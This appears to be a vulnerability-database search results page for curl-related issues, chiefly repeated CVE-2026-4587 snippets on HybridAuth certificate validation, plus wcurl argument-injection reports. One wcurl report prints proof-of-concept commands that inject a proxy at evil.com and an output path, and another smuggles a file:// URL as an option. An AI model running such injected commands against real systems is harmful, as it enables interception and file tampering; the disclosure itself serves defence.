17 matches found
curl: wcurl treats some URL operands after -- as curl options
I found that wcurl does not always keep operands after -- in a pure URL-data context. The documented way to pass curl options through wcurl is --curl-options, but a value supplied as a URL operand can still reach the final curl command as an option, for example wcurl -- "--url=file:///...". A...
CVE-2026-4587
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
EUVD-2026-14425
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
Improper Certificate Validation
Overview: hybridauth/hybridauth is a PHP Social Authentication Library. Affected versions of this package are vulnerable to Improper Certificate Validation through the setCurlOptions processing in src/HttpClient/Curl.php. An attacker can intercept or tamper with HTTPS traffic by supplying malicious...
CVE-2026-4587
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
CVE-2026-4587
CVE-2026-4587 affects HybridAuth up to 3.12.2. The issue involves improper certificate validation caused by manipulation of curlOptions in src/HttpClient/Curl.php of the SSL Handler. Exploitation can be remote and the attack has high complexity; no public exploit details or impact beyond the desc...
CVE-2026-4587 HybridAuth SSL Curl.php certificate validation
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
CVE-2026-4587
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
CVE-2026-4587 HybridAuth SSL Curl.php certificate validation
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
Hybridauth Trust Management Issue Vulnerability
Hybridauth is an open-source web-based authentication and authorization software developed by Hybridauth. Versions of Hybridauth 3.12.2 and earlier contained a vulnerability related to trust management. This vulnerability stemmed from incorrect handling of parameters in the curlOptions file withi...
PT-2026-27123
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...
curl: wcurl Argument Injection via Unquoted Variable
When I was code auditing curl I stumbled upon a vulnerability that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...
Fedora 41 : php-tcpdf (2024-7d6412477b)
The remote Fedora 41 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-7d6412477b advisory. Version 6.8.0 2024-12-23 - Requires PHP 7.1+ and curl extension. - Escape error message. - Use strict time-constant function to compare TCPDF-tag...
Improper Certificate Validation
Overview: Affected versions of this package are vulnerable to Improper Certificate Validation due to the unsafe configuration of CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER. Note: This is only exploitable when using libcurl. Remediation: Upgrade tecnickcom/tcpdf to version 6.8.0 or higher...
httpstat - Curl Statistics Made Simple
httpstat visualizes curl(1) statistics in a way of beauty and clarity. It is a single file Python script that has no dependency and is compatible with Python 3. Installation There are three ways to get httpstat: Download the script directly: wget...
curl security, bug fix, and enhancement update
7.29.0-35 - fix incorrect use of a previously loaded certificate from file related to CVE-2016-5420 7.29.0-34 - acknowledge the --no-sessionid/CURLOPT_SSL_SESSIONID_CACHE option required by the fix for CVE-2016-5419 7.29.0-33 - fix re-using connections with wrong client cert CVE-2016-5420 - fix TLS...
PHP 5.4.x < 5.4.34 / 5.5.x < 5.5.18 / 5.6.x < 5.6.2 Multiple Vulnerabilities